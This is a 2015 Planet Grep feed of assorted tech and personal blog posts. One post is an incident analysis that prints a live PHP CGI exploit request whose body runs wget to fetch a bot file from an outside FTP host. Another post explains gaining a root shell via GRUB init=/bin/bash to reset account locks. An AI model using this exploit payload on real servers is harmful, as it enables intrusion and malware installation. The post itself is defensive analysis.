03 Jul 2015

feedPlanet Grep

Xavier Mertens: BSidesLisbon 2015 Wrap-Up

BSidesLisbonHere is a quick wrap-up about the just-ended BSidesLisbon event. This is the second edition of this BSides event organized in Portugal. The philosophy of those events is well known: organized by and for the community, free, open and creating a lot of opportunities to meet peers. A classic but effective organization: talks, lightning talks, a CTF but two tracks in parallel. Here is a review of the ones I attended.

The day started with my friend Wim Remes's keynote: "Damn kids, they're all alike". Wim's message was: "learn and share". He started with a review of the hacker's manifesto. Written in 1986, it remains so relevant today. Key values are:

Wim addressed the problem of the Infosec community vs the industry. If a clear distinction is mandatory, at a certain time, we need to move forward and take our responsibilities by putting our knowledge into companies/organizations. If some security researchers are seen as rockstars (or want to be one), that's not the best way to behave. Some Wim's slides were nice with good quotes. I particularly liked this one:

Your knowledge is a weapon, you are a threat

The keynote was followed by a series of very interesting questions and exchange of ideas.

The first talk was given by Doron Shiloach from IBM X-Force: "Taking threat intelligence to the next level". Doron started with a review of the threat intelligence topic, based on a definition by Gartner. From an industry perspective, criteria for evaluation are:

The next part was dedicated to the techniques to built a good threat intelligence, where to find the right information. Once done, we need to make it available. Not only between humans but also between computers. To achieve this, Doron introduced Taxii and STIX. Personally, I found the talk to focused on IBM X-Force services… but anyway, interesting stuff was presented.

For the next time slot, there was only one presentation, the other speaker was not able to attend the event. The tool Shellter was presented by its developer Kyriakos Economou. After explaining why classical shell code injection sucks, Kyriakos's tool was presented in details. Shellter is a dynamic shell injector with only one goal: evade antivirus detection! The presentation ended with nice demos of malicious generated files not being detected by AV products! The joy of seeing a scan result on virustotal.com: 0/55!

After the lunch break, I followed Ricardo Dias's presentation about malware clustering. By cluster, we mean here a group of malwares that share similar structures or behavior. Ricardo's daily job is to detect malicious code and, to improve this task, he developed a tool to create clusters based on multiple information about the PE files (only this file type is analyzed). Ricardo explained in details how clusters are created. He used popular algorithms for this: reHash or impHash. The next part of the presentation was based on demos of the tool created by Ricardo. I was impressed by the quality and accuracy of the information make available through the clusters!

The next talk was also focusing on security visualization. Tiago Henriques and Tiago Martins presented "Security Metrics: Why, where and how?". Seeing the amount of data that we have to manage today and the multiple sources, it became very difficult to be able to analyze them without proper tools. That was the topic presented by Tiago & Tiago. After explaining how to use visualization tools in the right way and answering questions like:

They demonstrated how to extract nice information from important datasets.

Then, Pedro Vilaça presented his research about malicious kernel modules in OSX: "BadXNU, a rotten apple!". For sure, never, never left your Macbook unattended close to Pedro! Normally, to load a new module to the OSX kernel, checks are performed like verifying the module signature. Pedro explained how to bypass this and inject malicious code into the kernel. For Pedro, Apple is doing bad controls and tests should be performed at ring 0 (kernel level) and not in userland! (like Microsoft does). Impressive talk!

Finally, my last talk was the one of Tiago Pereira: "What botnet is this?". The talk was a resume of a malware analysis involving DGA or "Domain Generation Algorithm". The goal was to perform the reverse engineering of the malware to understand the DGA algorithm used. Also very interesting, especially when he explained how to bypass the packing of the binary to extract the code!

Unfortunately, I was not able to attend the last keynote presented by Steve Lord, I hope that the slides will be available somewhere. The day ended with the speaker dinner (thanks for the organizers for the invitation!) in a relaxed atmosphere. Now, it's the weekend and I'll spend some good times with my wife in the sunny Lisbon!

03 Jul 2015 10:06pm GMT

Dieter Plaetinck: Focusing on open source monitoring. Joining raintank.

Goodbye Vimeo

It's never been as hard saying goodbye to the people and the work environment as it is now.
Vimeo was created by dedicated film creators and enthusiasts, just over 10 years ago, and today it still shows. From the quirky, playful office culture, the staff created short films, to the tremendous curation effort and staff picks including monthly staff screenings where we get to see the best of the best videos on the internet each month, to the dedication towards building the best platform and community on the web to enjoy videos and the uncompromising commitment to supporting movie creators and working in their best interest.
Engineering wise, there has been plenty of opportunity to make an impact and learn.
Nonetheless, I have to leave and I'll explain why. First I want to mention a few more things.

vimeo goodbye drink

In Belgium I used to hitchhike to/from work so that each day brought me opportunities to have conversations with a diverse, fantastic assortment of people. I still fondly remember some of those memories. (and it was also usually faster than taking the bus!)
Here in NYC this isn't really feasible, so I tried the next best thing. A mission to have lunch with every single person in the company, starting with those I don't typically interact with. I managed to have lunch with 95 people, get to know them a bit, find some gems of personalities and anecdotes, and have conversations on a tremendous variety of subjects, some light-hearted, some deep and profound. It was fun and I hope to be able to keep doing such social experiments in my new environment.

Vimeo is also part of my life in an unusually personal way. When I came to New York (my first ever visit to the US) in 2011 to interview, I also met a pretty fantastic woman in a random bar in Williamsburg. We ended up traveling together in Europe, I decided to move the US and we moved in together. I've had the pleasure of being submerged in both American and Greek culture for the last few years, but the best part is that today we are engaged and I feel like the luckiest guy in the world. While I've tried to keep work and personal life somewhat separate, Vimeo has made an undeniable ever lasting impact on my life that I'm very grateful for.

At Vimeo I found an area where a bunch of my interests converge: operational best practices, high performance systems, number crunching, statistics and open source software. Specifically, timeseries metrics processing in the context of monitoring. While I have enjoyed my opportunity to make contributions in this space to help our teams and other companies who end up using my tools, I want to move out of the cost center of the company, I want to be in the department that creates the value. If I want to focus on open source monitoring, I should align my incentives with those of my employer. Both for my and their sake. I want to make more profound contributions to the space. The time has come for me to join a company for which the main focus is making open source monitoring better.

Hello Raintank!

Over the past two years or so I've talked to many people in the industry about monitoring, many of them trying to bring me into their team. I never found a perfect fit but as we transitioned from 2014 into 2015, the starts seemingly aligned for me. Here's why I'm very excited to join the Raintank crew:

OK, so what am I really up to?

Grafana is pretty much the leading open source metrics dashboard right now. So it only makes sense that Raintank is a heavy Grafana user and contributor. My work, logically, revolves around codifying some of the experience and ideas I have, and making them accessible through the polished interface that is Grafana, which now also has a full time UX designer working on it. Since according to the Grafana user survey alerting is the most sorely missed non-feature of Grafana, we are working hard on rectifying this and it is my full-time focus. If you've followed my blog you know I have some thoughts on where the sweet spot lies in clever alerting. In short, take the claims of anomaly detection via machine learning with a big grain of salt, and instead, focus on enabling operators to express complex logic simply, quickly, and in an agile way. My latest favorite project, bosun exemplifies this approach (highly recommend giving this a close look).

The way I'm thinking of it now, the priorities (and sequence of focus) for alerting within Grafana will probably be something like this:

There's a lot of thought work, UX and implementation details around this topic, I've created a github ticket to kick off a discussion and am curious to hear your thoughts. Finally, if any of this sounds interesting to you, you can sign up to the grafana newsletter or the raintank newsletter which will get you info on the open source platform as well as the SaaS product. Both are fairly low volume.


office sausolito It may look like I'm not doing much from my temporary Mill Valley office, but trust me, cool stuff is coming!

03 Jul 2015 4:22pm GMT

Frank Goossens: Music from Our Tube; the Jadim De Castro groove

Junior Jack's E-Samba is a nice dance-classic, but the groove, melody and lyrics were written a long time ago by Jadim De Castro as "Negra Sem Sandalia" and was featured in "Orfeu Negro", a re-interpretation of the Greek legend of Orpheus and Eurydice by Marcel Camus, set in the context of Brazil carnival.

YouTube Video
Watch this video on YouTube or on Easy Youtube.

Possibly related twitterless twaddle:

03 Jul 2015 2:53pm GMT

02 Jul 2015

feedPlanet Grep

Dieter Plaetinck: Moved blog to hugo, fastly and comma

02 Jul 2015 11:35pm GMT

01 Jul 2015

feedPlanet Grep

Dries Buytaert: One year later: the Acquia Certification Program

A little over a year ago we launched the Acquia Certification Program for Drupal. We ended up the first year with close to 1,000 exams taken, which exceeded our goal of 300-600. Today, I'm pleased to announce that the Acquia Certification Program passed another major milestone with over 1,000 exams passed (not just taken).

People have debated the pros and cons of software certifications for years (including myself) so I want to give an update on our certification program and some of the lessons learned.

Acquia's certification program has been a big success. A lot of Drupal users require Acquia Certification; from the Australian government to Johnson & Johnson. We also see many of our agency partners use the program as a tool in the hiring process. While a certification exam can not guarantee someone will be great at their job (e.g. we only test for technical expertise, not for attitude), it does give a frame of reference to work from. The feedback we have heard time and again is how the Acquia Certification Program is tough, but fair; validating skills and knowledge that are important to both customers and partners.

We also made the Certification Magazine Salary Survey as having one of the most desired credentials to obtain. To be a first year program identified among certification leaders like Cisco and Red Hat speaks volumes on the respect our program has established.

Creating a global certification program is resource intensive. We've learned that it requires the commitment of a team of Drupal experts to work on each and every exam. We now have four different exams: developer, front-end specialist, backend specialist and site builder. It roughly takes 40 work days for the initial development of one exam, and about 12 to 18 work days for each exam update. We update all four of our exams several times per year. In addition to creating and maintaining the certification programs, there is also the day-to-day operations for running the program, which includes providing support to participants and ensuring the exams are in place for testing around the globe, both on-line and at test centers. However, we believe that effort is worth it, given the overall positive effect on our community.

We also learned that benefits are an important part to participants and that we need to raise the profile of someone who achieves these credentials, especially those with the new Acquia Certified Grand Master credential (those who passed all three developer exams). We have a special Grand Master Registry and look to create a platform for these Grand Masters to help share their expertise and thoughts. We do believe that if you have a Grand Master working on a project, you have a tremendous asset working in your favor.

At DrupalCon LA, the Acquia Certification Program offered a test center at the event, and we ended up having 12 new Grand Masters by the end of the conference. We saw several companies stepping up to challenge their best people to achieve Grand Master status. We plan to offer the testing at DrupalCon Barcelona, so take advantage of the convenience of the on-site test center and the opportunity to meet and talk with Peter Manijak, who developed and leads our certification efforts, myself and an Acquia Certified Grand Master or two about Acquia Certification and how it can help you in your career!

01 Jul 2015 1:31pm GMT

29 Jun 2015

feedPlanet Grep

Lionel Dricot: Les 5 réponses à ceux qui veulent préserver l’emploi

3226545588_0994d1ddba_z

Si vous avez été redirigé vers cette page, c'est que d'une manière ou d'une autre vous vous êtes inquiété pour la préservation d'un type d'emploi voire que vous avez même proposé des idées pour sauvegarder ou créer de l'emploi.

Les 5 arguments contre la préservation de l'emploi

Chacun des arguments peut être approfondi en cliquant sur le ou les liens appropriés.

1. La technologie a pour but premier de nous faciliter la vie et, en conséquence, de réduire notre travail. Détruire l'emploi n'est donc pas une conséquence de quoi que ce soit, c'est le but premier que recherche notre espèce depuis des millénaires ! Et nous sommes en train de réussir ! Pourquoi voudrions-nous revenir en arrière afin d'atteindre l'inefficace plein-emploi ?

2. Le fait de ne pas travailler n'est pas un problème. C'est le fait de ne pas avoir d'argent pour vivre qui l'est. Nous avons malheureusement tendance à confondre le travail et le social. Nous sommes convaincus que seul le travail rapporte de l'argent mais c'est une croyance complètement erronée. Pour approfondir : Qu'est-ce que le travail ?

3. Vouloir créer de l'emploi revient à creuser des trous pour les reboucher. C'est non seulement stupide, c'est également contre-productif et revient à construire la société la plus inefficace possible !

4. Si créer/préserver l'emploi est un argument recevable dans un débat, alors absolument tout peut être justifiable : depuis la destruction de nos ressources naturelles à la torture et la peine de mort en passant par le sacrifice de milliers de vies sur les routes. C'est ce que j'appelle l'argument du bourreau.

5. Quel que soit votre métier, il pourra être fait mieux, plus vite et moins cher par un logiciel dans la décennie qui vient. C'est bien sûr évident quand on pense aux chauffeurs de taxi/Uber mais cela comprend également les artistes, les politiciens et même les chefs d'entreprises.

Conclusion : s'inquiéter pour l'emploi est dangereusement rétrograde. Ce n'est pas facile car on nous bourre le crâne avec cette superstition mais il est indispensable de passer à l'étape suivante. Que l'on apprécie l'idée ou pas, nous sommes déjà dans une société où tout le monde ne travaille pas. C'est un fait et le futur n'a que faire de votre opinion. La question n'est donc pas de créer/préserver l'emploi mais de s'organiser dans une société où l'emploi est rare.

Personnellement, je pense que le revenu de base, sous une forme ou une autre, est une piste à explorer sérieusement.

Photo par Friendly Terrorist.

Merci d'avoir pris le temps de lire ce billet librement payant. Prenez la liberté de me soutenir avec quelques milliBitcoins, une poignée d'euros, en me suivant sur Tipeee, Twitter, Google+ et Facebook !

Ce texte est publié par Lionel Dricot sous la licence CC-By BE.

Flattr this!

29 Jun 2015 6:51pm GMT

Bert de Bruijn: How to solve "user locked out due to failed logins" in vSphere vMA

In vSphere 6, if the vi-admin account get locked because of too many failed logins, and you don't have the root password of the appliance, you can reset the account(s) using these steps:

  1. reboot the vMA
  2. from GRUB, "e"dit the entry
  3. "a"ppend init=/bin/bash
  4. "b"oot
  5. # pam_tally2 --user=vi-admin --reset
  6. # passwd vi-admin # Optional. Only if you want to change the password for vi-admin.
  7. # exit
  8. reset the vMA
  9. log in with vi-admin

These steps can be repeated for root or any other account that gets locked out.

If you do have root or vi-admin access, "sudo pam_tally2 --user=mylockeduser --reset" would do it, no reboot required.

29 Jun 2015 1:13pm GMT

Laurent Bigonville: systemd integration is the “ps” command

In Debian, since version 2:3.3.10-1, the procps package has the systemd integration bits enabled. This means that now the "ps" command can display which (user) unit has started a process or to which slice or scope it belongs.

For example with the following command:

ps -eo pid,user,command,unit,uunit,slice

ps-systemd

29 Jun 2015 10:29am GMT

27 Jun 2015

feedPlanet Grep

Mattias Geniar: The Broken State of Trust In Root Certificates

The post The Broken State of Trust In Root Certificates appeared first on ma.ttias.be.

Yesterday news came out that Microsoft has quietly pushed new Root Certificates via its Windows Update system.

The change happened without any notifications, without any KB and without anyone really paying attention to it.

Earlier this month, Microsoft has quietly started pushing a bunch of new root certificates to all supported Windows systems. What is concerning is that they did not announce this change in any KB article or advisory, and the security community doesn't seem to have noticed this so far.

Even the official Microsoft Certificate Program member list makes no mention of these changes whatsoever.

Microsoft quietly pushes 18 new trusted root certificates

This just goes to show how fragile our system of trust really is. Adding new Root Certificates to an OS essentials gives the owner of that certificate (indirect) root privileges on the system.

It may not allow direct root access to your machines, but it allows them to publish certificates your PC/server blindly trusts.

This is an open door for phishing attacks with drive-by downloads.

I think this demonstrates 2 very major problems with SSL Certificates we have today:

  1. Nobody checks which root certificates are currently trusted on your machine(s).
  2. Our software vendors can push new Root Certificates in automated updates without anyone knowing about it.

Both problems come back to the basis of trust.

Should we blindly trust our OS vendors to be able to ship new Root Certificates without confirmation, publication or dialog?

Or do we truly not care at all, as demonstrated by the fact we don't audit/validate the Root Certificates we have today?

The post The Broken State of Trust In Root Certificates appeared first on ma.ttias.be.

Related posts:

  1. Chrome Version 42 Starts Marking SHA-1 SSL Certificates As Insecure As announced in September 2014, Chrome version 42 will start...
  2. Mozilla Blocking CCNIC's CA Too So it isn't just Google. Sucks if you're ordering your...
  3. Tearing Down Lenovo's Superfish Statement The last 48 hours have been interesting, given Lenovo has...

27 Jun 2015 12:53pm GMT

26 Jun 2015

feedPlanet Grep

Xavier Mertens: Attackers Make Mistakes But SysAdmins Too!

Keep Calm & Avoid ErrorsA few weeks ago I blogged about "The Art of Logging" and explained why it is important to log efficiently to increase changes to catch malicious activities. They are other ways to catch bad guys, especially when they make errors, after all they are humans too! But it goes the other way around too with system administrators. Last week, a customer asked me to investigate a suspicious alert reported by an IDS. It looked like an restricted web server (read: which was not supposed to be publicly available!) was hit by an attack coming from the wild Internet.

The attack had nothing special, it was a bot scanning for websites vulnerable to the rather old PHP CGI-BIN vulnerability (CVE-2012-1823). The initial HTTP request looked strange:

POST
//%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%
75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F
%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%
66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6
E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A
%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%
3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3
D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F
%69%6E%70%75%74+%2D%6E HTTP/1.1
Host: -c
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
Oracle-ECID: 252494263338,0
ClientIP: xxx.xxx.xxx.xxx
Chronos: aggregate
SSL-Https: off
Calypso-Control: H_Req,180882440,80
Surrogate-Capability: orcl="webcache/1.0 Surrogate/1.0 ESI/1.0 ESI-Inline/1.0 ESI-INV/1.0 ORAESI/9.0.4 POST-Restore/1.0"
Oracle-Cache-Version: 10.1.2
Connection: Keep-Alive, Calypso-Control

<? system("cd /tmp;wget ftp://xxxx:xxxx\@xxx.xxx.xxx.xxx/bot.php"); ?>

Once decoded, the HTTP query looks familiar:

POST //cgi-bin/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -d auto_prepend_file=php://input -n

Did you see that the header 'Host' contains an invalid value? ('-c'). I tried to understand this header but for me it's a bug in the attacker's code. The RFC2616 covers the HTTP/1.1 protocol and more precisely how requests are formed:

$ nc blog.rootshell.be 80
GET / HTTP/1.1
Host: blog.rootshell.be
HTTP/1.1 200 OK

In the case above, the request was clearly malformed and the reverse proxy sitting in front of the web server decided to forward it to its default web server. If a reverse proxy can't find a valid host to send the incoming requests, it will use, based on its configuration, the default one. Let's take an Apache config:

NameVirtualHost *
<VirtualHost *>
DocumentRoot /siteA/
ServerName www.domainA.com
</VirtualHost>
<VirtualHost *>
DocumentRoot /siteB/
ServerName www.domainB.com
</VirtualHost>

In this example, Apache will use the first block if no other matching block is found. If we query a virtual host 'www.domainC.com', we will receive the homepage of 'www.domainA.com'. Note that such configuration may expose sensitive data into the wild or expose a vulnerable server to the Internet. To prevent this, always add a default site with an extra block on top of the configuration:

<VirtualHost *>
DocumentRoot /defaultSite/
</VirtualHost>

This site can be configured as a "last resort web page" (like implemented in many load-balancers) and why not run a honeypot to collect juicy data? Conclusion: From an defender point of view, try to isolate invalid queries as much as possible and log everything. From an attacker point of view, always try malformed HTTP queries, maybe you will find interesting web sites hosted on the same server!

26 Jun 2015 10:21pm GMT

Mattias Geniar: RFC 7568: SSL 3.0 Is Now Officially Deprecated

The post RFC 7568: SSL 3.0 Is Now Officially Deprecated appeared first on ma.ttias.be.

The IETF has taken an official stance in the matter: SSL 3.0 is now deprecated.

It's been a long time coming. We've had, as many others, SSL 3.0 disabled on all our servers for multiple years now. And I'm now happy to report the IETF is making the end of SSL 3.0 "official".

The Secure Sockets Layer version 3.0 (SSLv3), as specified in RFC 6101, is not sufficiently secure. This document requires that SSLv3 not be used.

The replacement versions, in particular, Transport Layer Security (TLS) 1.2 (RFC 5246), are considerably more secure and capable protocols.

RFC 7568: Deprecating Secure Sockets Layer Version 3.0

Initiatives like disablessl3.com have been around for quite a while, urging system administrators to disable SSLv3 wherever possible. With POODLE as its most known attack, the death of SSLv3 is a very welcome one.

The RFC targets everyone using SSL 3.0: servers as well as clients.

Pragmatically, clients MUST NOT send a ClientHello with ClientHello.client_version set to {03,00}.

Similarly, servers MUST NOT send a ServerHello with ServerHello.server_version set to {03,00}. Any party receiving a Hello message with the protocol version set to {03,00} MUST respond with a "protocol_version" alert message and close the connection.

SSL is dead. Long live TLS 1.2(*).

(*) while it lasts.

The post RFC 7568: SSL 3.0 Is Now Officially Deprecated appeared first on ma.ttias.be.

Related posts:

  1. Patch your webservers for the SSLv3 POODLE vulnerability (CVE­-2014­-3566) First, read this: CVE­-2014­-3566. Next: realise that the SSL vulnerability...
  2. Chrome To Explicitly Mark HTTP Connections As Non-Secure So 2015 will be the year of HTTPs/SSL/TLS. Chromium, the...
  3. Chrome Version 42 Starts Marking SHA-1 SSL Certificates As Insecure As announced in September 2014, Chrome version 42 will start...

26 Jun 2015 7:39pm GMT

Frank Goossens: Music from Our Tube; Souldancing on a Friday

While listening to random old "It is what it is"-shows (Merci Laurent) I heard this re-issue of Heiko Laux's Souldancer. No go have some fun you kids!

YouTube Video
Watch this video on YouTube or on Easy Youtube.

Possibly related twitterless twaddle:

26 Jun 2015 11:25am GMT

25 Jun 2015

feedPlanet Grep

Joram Barrez: All Activiti Community Day 2015 Online

As promised in my previous post, here are the recordings of the talks done by our awesome Community people. The order below is the order at which they were planned in the agenda (no favouritism!). Sadly, the camera battery died during the recording of the talks before lunch. As such, the talks of Yannick Spillemaeckers […]

25 Jun 2015 12:04pm GMT

23 Jun 2015

feedPlanet Grep

Lionel Dricot: Le « gravel » ou quand les cyclistes bouffent du gravier

20150620_141422

Attention, ce bolg est bien un bolg sur le cyclimse. Merci de votre compréhension !

Dans cet article, j'aimerais présenter une discipline cycliste très populaire aux États-Unis : le « gravel grinding », qui signifie littéralement « broyage de gravier », plus souvent appelé « gravel ».

Mais, pour ceux qui ne sont pas familiers avec le vélo, je vais d'abord expliquer pourquoi il y a plusieurs types de vélos et plusieurs façons de rouler en vélo.

Les différents types de cyclisme

Vous avez certainement déjà remarqué que les vélos des coureurs du tour de France sont très différents du VTT que vient d'acquérir votre petite nièce.

4805478269_dd774e0a41_z

Un cycliste sur route, par Tim Shields.

En effet, en fonction du parcours, le cycliste sera confronté à des obstacles différents. Sur une longue route dans un environnement venteux, le cycliste sera principalement freiné par la résistance de l'air. Il doit donc être aérodynamique. Sur un étroit lacet de montagne, le cycliste se battra contre la gravité et doit donc être le plus léger possible. Par contre, s'il emprunte un chemin de pierres descendant entre les arbres, le principal soucis du cycliste sera de garder les roues en contact avec le sol et de ne pas casser son matériel. Le vélo devra donc amortir au maximum les chocs et les aspérités du terrain.

Enfin, un vélo utilitaire cherchera lui à maximiser le confort du cycliste et l'aspect pratique du vélo, même au prix d'une baisse drastique des performances.

Les compromis technologiques

Aujourd'hui, les vélos sont donc classés en fonction de leur utilisation. Un vélo très aérodynamique sera utilisé pour les compétitions de contre-la-montre ou les triathlons. Pour les courses classiques, les pros utilisent un vélo de route de type "aéro" ou un vélo ultra léger en montagne.

7841128798_7b8c77d742_z

Vélo aérodynamique en contre-la-montre, par Marc

Pour rouler dans les bois, on préfèrera un VTT mais les VTT eux-mêmes se déclinent en plusieurs versions, le plus éloigné du vélo de route étant le vélo de descente qui est très lourd, bardé d'amortisseurs et qui, comme son nom l'indique, ne peut servir qu'en descendant.

Ceci dit, la plupart de ces catégories sont liées à des contraintes technologiques. Ne pourrait-on pas imaginer un vélo ultra-léger (adapté à la montagne) qui soit ultra-aérodynamique (adapté à la route ou au contre-la-montre) et ultra-confortable (adapté à la ville) ? Oui, on peut l'imaginer. Ce n'est pas encore possible aujourd'hui et rien ne dit que ce le sera un jour. Mais ce n'est théoriquement pas impossible.

Le compromis physique

Par contre, il existe un compromis qui lui est physiquement indiscutable : le rendement par rapport à l'amortissement. Tout amortissement entraîne une perte de rendement, c'est inévitable.

L'amortissement a deux fonctions : maintenir le vélo en contact avec la route même sur une surface inégale et préserver l'intégrité physique du vélo voire le confort du cycliste.

Le cycliste va avancer en appliquant une force sur la route à travers son pédalier et ses pneus. Le principe d'action-réaction implique que la route applique une force proportionnelle sur le vélo, ce qui a pour effet de le faire avancer.

L'amortissement, lui, a pour objectif de dissiper les forces transmises au vélo par la route. Physiquement, on voit donc bien que rendement et amortissement sont diamétralement opposé.

2213372852_6261e6b987_z

Un vélo de descente, par Matthew.

Pour vous en convaincre, il suffit d'emprunter un vélo pourvu d'amortisseurs et de régler ceux-ci sur amortissement maximal. Tentez ensuite de gravir une route montant fortement pendant plusieurs centaines de mètres. Vous allez immédiatement percevoir que chaque coup de pédale est partiellement amorti par le vélo.

Montre-moi tes pneus et je te dirai qui tu es…

L'amortisseur principal présent sur tous les types de vélos sans exception est le pneu. Le pneu est remplit d'air. La compression de l'air atténue les chocs.

Une idée largement répandue veut que les vélos de routes aient des pneus fins car les pneus larges augmentent le frottement sur la route. C'est tout à fait faux. En effet, tous les pneus cherchent à frotter au maximum sur la route car c'est ce frottement qui transmet l'énergie. Un pneu qui ne frotte pas sur la route patine, ce que l'on souhaite éviter à tout prix.

Il a même été démontré que des pneus plus larges permettaient de transmettre plus d'énergie à la route et étaient plus efficaces. C'est une des raisons pour lesquelles les Formule 1 ont des pneus très larges.

Cependant des pneus très larges signifient également plus d'air et donc plus d'amortissement. Les pneus larges dissipent donc plus d'énergie à chaque coup de pédale !

8148010012_1fa18fe3d1_z

Roues de VTT, par Vik Approved.

C'est pourquoi les vélos de route ont des pneus très fin (entre 20 et 28mm d'épaisseur). Ceux-ci sont également gonflés à très haute pression (plus de 6 bars). La quantité d'air étant très petite et très comprimée, l'amortissement est minimal.

Par contre, en se déformant les pneus larges permettent d'épouser les contours d'un sol inégal. En amortissant les chocs, ils sont également moins sensibles aux crevaisons. C'est la raison pour laquelle les VTT ont des pneus qui font généralement plus de 40mm d'épaisseur et qui sont moins gonflés (entre 2 et 4 bars). Des pneus plus fins patineraient (perte d'adhérence) et crèveraient au moindre choc.

En résumé, le pneu est certainement l'élément qui définit le plus un vélo, c'est véritablement sa carte d'identité. Pour en savoir plus, voici un lien très intéressant sur la résistance au roulement des pneus.

Entre la route et le VTT

Nous avons donc défini deux grandes familles de vélos sportifs. Tout d'abord les vélos de routes, avec des pneus de moins de 30mm, taillés pour la vitesse sur une surface relativement lisse mais incapables de rouler hors du bitume. Ensuite les VTTs, avec des pneus de plus de 40mm, capables de passer partout mais qui sont tellement inefficaces sur la route qu'il est préférable de les emmener en voiture jusqu'à l'endroit où l'on veut pratiquer. Il existe également bien d'autres types de vélos mais ils sont moins efficaces en terme de performance : le city-bike, inspiré du VTT qui optimise l'aspect pratique, le « hollandais », qui optimise le confort dans un pays tout plat aux pistes cyclables bien entretenues ou le fixie, qui optimise le côté hipster de son possesseur.

Mais ne pourrait-on pas imaginer un vélo orienté performance qui serait efficace sur route et qui pourrait passer partout où le VTT passe ?

Pour répondre à cette question, il faut se tourner vers une discipline particulièrement populaire en Belgique : le cyclocross. Le cyclocross consiste à prendre un vélo de route, à lui mettre des pneus un peu plus larges (entre 30 et 35mm) et à le faire rouler dans la boue en hiver. Lorsque la boue est trop profonde ou que le terrain est trop pentu, le cycliste va descendre de sa machine, l'épauler et courir tout en la portant. L'idée est que, dans ces situations, il est de toutes façons plus rapide de courir (10-12km/h) que de pédaler (8-10km/h).

16349387856_4def3a1116_z

Une coureuse de cyclocross, par Sean Rowe

Le vélo de cyclocross doit donc être léger (pour le porter), capable de rouler et virer dans la boue mais avec un amortissement minimal pour être performant sur les passages les plus lisses.

Ce type de configuration se révèle assez efficace sur la route : un vélo de cyclo-cross roule sans difficulté au-delà des 30km/h mais permet également de suivre un VTT traditionnel dans les chemins forestiers. L'amortissement moindre nécessitera cependant de diminuer la vitesse dans les descentes très rugueuses. Les montées les plus techniques sur les sols les plus gras nécessiteront de porter le vélo (avec parfois le résultat inattendu de dépasser les vététistes en train de mouliner).

La naissance du gravel

Si une course de vélo de route peut se parcourir sur des longues distances entre un départ et une arrivée, le cyclo-cross, le VTT et les autres disciplines sont traditionnellement confinées à un circuit court que les concurrents parcourent plusieurs fois. La première raison est qu'il est de nos jours difficile de concevoir un long parcours qui ne passera pas par la route.

De plus, si des motos et des voitures peuvent accompagner les vélos de routes pour fournir le ravitaillement, l'aide technique et la couverture médiatique, il n'en est pas de même pour les VTTs. Impossible donc de filmer correctement une course de VTT ou de cyclocross qui se disputerait sur plusieurs dizaines de km à travers les bois.
20150517_172633

Le genre de route qui donne son nom à la discipline.

L'idée sous-jacente du « gravel » est de s'affranchir de ces contraintes et de proposer des courses longues (parfois plusieurs centaines de km) entre un départ et une arrivée mais en passant par des sentiers, des chemins encaissés et, surtout, ces longues routes en gravier qui sillonnent les États-Unis entre les champs et qui ont donné leur nom à la discipline. Le passage par des routes asphaltées est également possible.

Des points de ravitaillements sont prévus par les organisateurs le long du parcours mais, entre ces points, le cyclistes sera le plus souvent laissé à lui-même. Transporter des chambre à air, du matériel de réparation et des sparadraps fait donc partie du sport !

Quand à la couverture média, elle sera désormais effectuée par les cyclistes eux-mêmes grâce à des caméras embarquées sur les vélos ou sur les casques.

L'essor du gravel

Au fond, il n'y a rien de vraiment neuf. Le mot « gravel » n'est jamais qu'un nouveau mot accolé à une discipline vieille comme le vélo lui-même. Mais ce mot « gravel » a permis une renaissance et une reconnaissance du concept.

Le succès des vidéos embarquées de cyclistes parcourant 30km à travers champs, 10km sur de l'asphalte avant d'attaquer 500m de côtes boueuses et de traverser une rivière en portant leur vélo contribuent à populariser le « gravel », principalement aux États-Unis où le cyclo-cross est également en plein essor.

La popularité de courses comme Barry-Roubaix (ça ne s'invente pas !) ou Gold Rush Gravel Grinder intéresse les constructeurs qui se mettent à proposer des cadres, des pneus et du matériel spécialement conçus pour le gravel.

Se mettre au gravel ?

Contrairement au vélo sur route ou au VTT sur circuit, le gravel comporte un volet romanesque. L'aventure, se perdre, explorer et découvrir font partie intégrante de la discipline. Dans l'équipe Deux Norh, par exemple, les sorties à vélo sont appelées des « quêtes » (hunt). L'intérêt n'est pas tant dans l'exploit sportif que de raconter une aventure, une histoire.

20150517_182129

L'auteur de ces lignes au cours d'une montée à travers bois.

Le gravel étant, par essence, un compromis, les vélos de cyclo-cross sont souvent les plus adaptés pour le pratiquer. D'ailleurs, beaucoup de cyclistes confirmés affirment que s'ils ne devaient avoir qu'un seul vélo pour tout faire, ce serait leur vélo de cyclo-cross. Cependant, il est tout à fait possible de pratiquer le gravel avec un VTT hardtail (sans amortissement arrière). Le VTT est plus confortable et passe plus facilement les parties techniques au prix d'une vitesse moindre dans les parties plus roulantes. Pour les parcours les plus sablonneux, certains vont jusqu'à s'équiper de pneus ultra-larges (les « fat-bikes »).

Par contre, je n'ai encore jamais vu de clubs de gravel ni la moindre course organisée en Belgique. C'est la raison pour laquelle j'invite les cyclistes belges à rejoindre l'équipe Belgian Gravel Grinders sur Strava, histoire de se regrouper entre gravelistes solitaires et, pourquoi pas, organiser des sorties communes.

Si l'aventure vous tente, n'hésitez pas à rejoindre l'équipe sur Strava. Et si vous deviez justement acheter un nouveau vélo et hésitiez entre un VTT ou un vélo de route, jetez un œil aux vélos de cyclo-cross. On ne sait jamais que vous aillez soudainement l'envie de bouffer du gravier !

Photo de couverture par l'auteur.

